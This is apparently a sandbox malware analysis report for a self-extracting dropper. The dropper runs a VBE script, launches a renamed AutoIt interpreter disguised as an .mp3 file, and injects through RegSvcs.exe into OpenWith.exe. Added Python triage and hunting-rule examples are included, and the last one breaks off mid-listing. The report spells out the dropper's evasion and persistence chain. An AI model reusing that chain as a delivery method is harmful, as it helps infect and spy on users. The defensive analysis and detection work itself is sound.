Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B048AA 0_2_00B048AA
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B3480E 0_2_00B3480E
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B05AFE 0_2_00B05AFE
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1ABC8 0_2_00B1ABC8
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B07CBA 0_2_00B07CBA
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1BC05 0_2_00B1BC05
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B03D9D 0_2_00B03D9D
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B14D32 0_2_00B14D32
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B2BEA7 0_2_00B2BEA7
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B05F39 0_2_00B05F39
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B15F0B 0_2_00B15F0B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00398037 7_2_00398037
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00392007 7_2_00392007
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038E0BE 7_2_0038E0BE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0037E1A0 7_2_0037E1A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0037225D 7_2_0037225D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003AA28E 7_2_003AA28E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003922C2 7_2_003922C2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038C59E 7_2_0038C59E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003FC7A3 7_2_003FC7A3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003AE89F 7_2_003AE89F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E291A 7_2_003E291A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A6AFB 7_2_003A6AFB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D8B27 7_2_003D8B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0039CE30 7_2_0039CE30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003A7169 7_2_003A7169
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_004051D2 7_2_004051D2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379240 7_2_00379240
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379499 7_2_00379499
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391724 7_2_00391724
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391A96 7_2_00391A96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00379B60 7_2_00379B60
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00397BAB 7_2_00397BAB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00391D40 7_2_00391D40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00397DDA 7_2_00397DDA
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01358250 14_2_01358250
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01355158 14_2_01355158
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01355148 14_2_01355148
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01358240 14_2_01358240
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_01357F2C 14_2_01357F2C
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A48419 15_2_05A48419
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5FC7D 15_2_05A5FC7D
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A4871F 15_2_05A4871F
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5C776 15_2_05A5C776
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5BE5A 15_2_05A5BE5A
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5C1DA 15_2_05A5C1DA
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5E833 15_2_05A5E833
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A57815 15_2_05A57815
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A57BA2 15_2_05A57BA2
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5BBAF 15_2_05A5BBAF
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A52340 15_2_05A52340
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAE0BE 16_2_00DAE0BE
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB2007 16_2_00DB2007
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB8037 16_2_00DB8037
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D9E1A0 16_2_00D9E1A0
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB22C2 16_2_00DB22C2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DCA28E 16_2_00DCA28E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D9225D 16_2_00D9225D
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAC59E 16_2_00DAC59E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E1C7A3 16_2_00E1C7A3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DCE89F 16_2_00DCE89F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E0291A 16_2_00E0291A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC6AFB 16_2_00DC6AFB
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF8B27 16_2_00DF8B27
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DBCE30 16_2_00DBCE30
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E251D2 16_2_00E251D2
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DC7169 16_2_00DC7169
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99240 16_2_00D99240
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99499 16_2_00D99499
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1724 16_2_00DB1724
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1A96 16_2_00DB1A96
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB7BAB 16_2_00DB7BAB
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00D99B60 16_2_00D99B60
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB7DDA 16_2_00DB7DDA
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB1D40 16_2_00DB1D40
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF8250 17_2_01BF8250
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF5158 17_2_01BF5158
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF5148 17_2_01BF5148
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF8240 17_2_01BF8240
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C3E3D 17_2_066C3E3D
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C7E1D 17_2_066C7E1D
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_06A62E20 17_2_06A62E20
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C9BC4 17_2_066C9BC4
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066D1B8C 17_2_066D1B8C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066D1C22 17_2_066D1C22
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_066C3000 17_2_066C3000
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: String function: 00390DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: String function: 0038FD60 appears 31 times
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: String function: 00DAFD60 appears 31 times
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: String function: 00DB0DC0 appears 46 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B257D8 appears 66 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B26630 appears 31 times
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: String function: 00B257A5 appears 34 times
Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs ngPebbPhbp.exe
Source: ngPebbPhbp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/48@0/1
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B0932C GetLastError,FormatMessageW,_wcslen,LocalFree, 0_2_00B0932C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D194F AdjustTokenPrivileges,CloseHandle, 7_2_003D194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 7_2_003D1F53
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF194F AdjustTokenPrivileges,CloseHandle, 16_2_00DF194F
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DF1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 16_2_00DF1F53
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 7_2_003E5B27
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 7_2_003DDC9C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 7_2_003F4089
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B1EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00B1EBD3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\SysWOW64\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0 Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: sfxname 0_2_00B2454A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: sfxstime 0_2_00B2454A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Command line argument: STARTDLG 0_2_00B2454A
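Two of the static observations in this section fit together: the sample creates a RarSFX0 directory and carries the sfxname/sfxstime/STARTDLG strings of a WinRAR self-extracting stub, and the OriginalFilename string found earlier in the sample's memory says the embedded payload's version info calls itself AutoIt3.exe, while the report shows it running as qwlvpmrupf.mp3 with tnlupe.mp3 as its argument. The following Python is an added example for this page, not Joe Sandbox code or anything taken from the sample. It carves the RAR archive that follows an SFX stub, lists which SFX stub strings are present, and reads the OriginalFilename entry to flag a renamed binary. The SAMPLE bytes are constructed (a fake MZ stub, the three strings, a hand-built VS_VERSIONINFO String entry and a RAR5 marker followed by invented bytes), the version-info lookup is a plain string scan rather than a resource-directory parser, and all function names are this example's own.

```python
"""Static triage for a WinRAR SFX dropper that carries a renamed AutoIt3.exe.

Added example for this page, not Joe Sandbox code.  SAMPLE is CONSTRUCTED:
a fake MZ stub, the three SFX stub strings the report lists, a fragment of a
VS_VERSIONINFO String entry, and a RAR5 marker followed by invented bytes.
The version-info lookup is a string scan, not a resource-directory parser.
"""
import struct
from typing import Dict, List, Optional, Tuple

RAR4_SIG = b"Rar!\x1a\x07\x00"       # RAR 1.5-4.x archive marker
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"   # RAR 5.x archive marker
SFX_MARKERS = ("sfxname", "sfxstime", "STARTDLG")


def find_rar_archive(data: bytes) -> Optional[Tuple[int, str]]:
    """Offset and format of the earliest RAR marker; in an SFX it follows the PE stub."""
    found = [(data.find(sig), fmt) for sig, fmt in ((RAR4_SIG, "RAR4"), (RAR5_SIG, "RAR5"))]
    found = [f for f in found if f[0] >= 0]
    return min(found) if found else None


def carve_archive(data: bytes) -> Optional[bytes]:
    """Bytes from the RAR marker to EOF; hand them to unrar/7z to list the dropped files."""
    hit = find_rar_archive(data)
    return data[hit[0]:] if hit else None


def sfx_markers(data: bytes) -> List[str]:
    """SFX stub strings present either as ASCII or as UTF-16LE."""
    return [m for m in SFX_MARKERS
            if m.encode() in data or m.encode("utf-16-le") in data]


def version_string(data: bytes, key: str) -> Optional[str]:
    """Value of a VS_VERSIONINFO String entry: UTF-16LE key, NUL, DWORD padding, UTF-16LE value, NUL."""
    needle = key.encode("utf-16-le") + b"\x00\x00"
    pos = data.find(needle)
    if pos < 0:
        return None
    pos += len(needle)
    while data[pos:pos + 2] == b"\x00\x00":        # skip alignment padding
        pos += 2
    end = pos
    while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
        end += 2
    return data[pos:end].decode("utf-16-le", errors="replace")


def triage(data: bytes, on_disk_name: str) -> Dict[str, object]:
    """The first checks an analyst makes on a dropper shaped like this one."""
    orig = version_string(data, "OriginalFilename")
    return {
        "is_pe": data[:2] == b"MZ",
        "sfx_markers": sfx_markers(data),
        "rar_archive": find_rar_archive(data),
        "original_filename": orig,
        # on-disk "qwlvpmrupf.mp3" vs. version info "AutoIt3.exe": a renamed interpreter
        "name_mismatch": bool(orig) and orig.lower() != on_disk_name.lower(),
    }


# Constructed stand-in for the sample; the bytes after the RAR5 marker are invented.
SAMPLE = (
    b"MZ" + b"\x90" * 62
    + b"sfxname\x00sfxstime\x00STARTDLG\x00"
    + struct.pack("<HHH", 0, 12, 1)                     # String: wLength, wValueLength, wType=text
    + "OriginalFilename".encode("utf-16-le") + b"\x00\x00" + b"\x00\x00"
    + "AutoIt3.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\x00" * 16
    + RAR5_SIG + b"\x33\x92\xb5\xe5\x0a\x01\x05\x06\x00\x05\x01\x01\x80\x80\x00"
)

if __name__ == "__main__":
    print(triage(SAMPLE, "qwlvpmrupf.mp3"))
```

On a real SFX the carved bytes can be written to a file and opened with `unrar l` or `7z l` to enumerate the dropped files (here rmxb.vbe, qwlvpmrupf.mp3 and tnlupe.mp3) without running the stub; the name mismatch check is the same evidence the report derives from the OriginalFilenameAutoIt3.exe memory string.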
Source: ngPebbPhbp.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ngPebbPhbp.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File read: C:\Users\user\Desktop\ngPebbPhbp.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ngPebbPhbp.exe "C:\Users\user\Desktop\ngPebbPhbp.exe"
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: unknown Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
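The process tree listed above is the most directly reusable part of this report for hunting: the SFX runs WScript.exe on rmxb.vbe out of the RarSFX0 temp directory, the script drives cmd.exe through ipconfig /release and /renew and then launches qwlvpmrupf.mp3 (a PE under a media-file extension) with tnlupe.mp3 as its argument, that process starts a RegSvcs.exe copied into %TEMP%, and RegSvcs.exe in turn starts the system binary OpenWith.exe that the report later sees injected. The Python below is an added example for this page, not Joe Sandbox code: it rebuilds the tree from Sysmon-style process-creation events and applies five rules, one per link in that chain. SAMPLE_EVENTS are constructed to mirror the report's "Process created" lines; the pids and ppids are invented, the parent of the first process (which the report leaves as "unknown") is assumed to be explorer.exe, and the rule names and directory patterns are this example's own choices.

```python
"""Hunting rules for the execution chain in this report's process tree.

Added example for this page, not Joe Sandbox code.  SAMPLE_EVENTS are
CONSTRUCTED Sysmon-style process-creation events that mirror the report's
"Process created" lines; pids/ppids are invented and the parent of the
first process (not named in the report) is assumed to be explorer.exe.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
EXEC_EXTS = {".exe", ".com", ".scr", ".pif"}
# .NET framework utilities commonly used as injection hosts; they live under
# %WINDIR%\Microsoft.NET, so a copy in %TEMP% is the anomaly, not the name.
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"\\(appdata\\(local\\temp|roaming)|users\\public|programdata)\\", re.I)
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.I)
SCRIPT_ARG = re.compile(r'"?([a-z]:\\[^"]+?\.(?:vbs|vbe|jse|js|wsf))"?', re.I)
IPCONFIG_LEASE = re.compile(r"\s/(release|renew)\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid: int, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Follow ppid links upward until a pid outside the event set (with a loop guard)."""
    chain: List[ProcEvent] = []
    cur = by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and len(chain) < 64:
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def evaluate(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    hits: List[str] = []
    name = basename(ev.image)
    parent = by_pid.get(ev.ppid)
    lineage = {basename(a.image) for a in ancestors(ev.pid, by_pid)}

    # R1: WScript/CScript running a script from a user-writable directory (RarSFX0\rmxb.vbe)
    if name in SCRIPT_HOSTS:
        m = SCRIPT_ARG.search(ev.cmdline)
        if m and USER_WRITABLE.search(m.group(1)):
            hits.append("script_host_from_user_writable")
    # R2: DHCP lease released/renewed with a script host somewhere in the lineage
    if name == "ipconfig.exe" and IPCONFIG_LEASE.search(ev.cmdline) and lineage & SCRIPT_HOSTS:
        hits.append("ipconfig_lease_change_under_script_host")
    # R3: a process image with a non-executable extension (qwlvpmrupf.mp3 is a PE)
    ext = name[name.rfind("."):] if "." in name else ""
    if ext not in EXEC_EXTS:
        hits.append("image_without_executable_extension")
    # R4: .NET utility started from a user-writable path (Temp\RegSvcs.exe)
    if name in DOTNET_UTILS and USER_WRITABLE.search(ev.image):
        hits.append("dotnet_utility_in_user_writable_dir")
    # R5: a Windows binary whose parent lives in a user-writable path (RegSvcs.exe -> OpenWith.exe)
    if WINDOWS_DIR.match(ev.image) and parent is not None and USER_WRITABLE.search(parent.image):
        hits.append("system_binary_spawned_by_user_writable_parent")
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """pid -> rule names, for every event that triggered at least one rule."""
    by_pid = {e.pid: e for e in events}
    result: Dict[int, List[str]] = {}
    for e in events:
        hits = evaluate(e, by_pid)
        if hits:
            result[e.pid] = hits
    return result


# Constructed events mirroring the report's tree (pids invented, explorer.exe parent assumed).
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Users\user\Desktop\ngPebbPhbp.exe", r'"C:\Users\user\Desktop\ngPebbPhbp.exe"'),
    ProcEvent(1010, 1000, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"'),
    ProcEvent(1020, 1010, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ipconfig /release'),
    ProcEvent(1030, 1020, r"C:\Windows\SysWOW64\ipconfig.exe", "ipconfig /release"),
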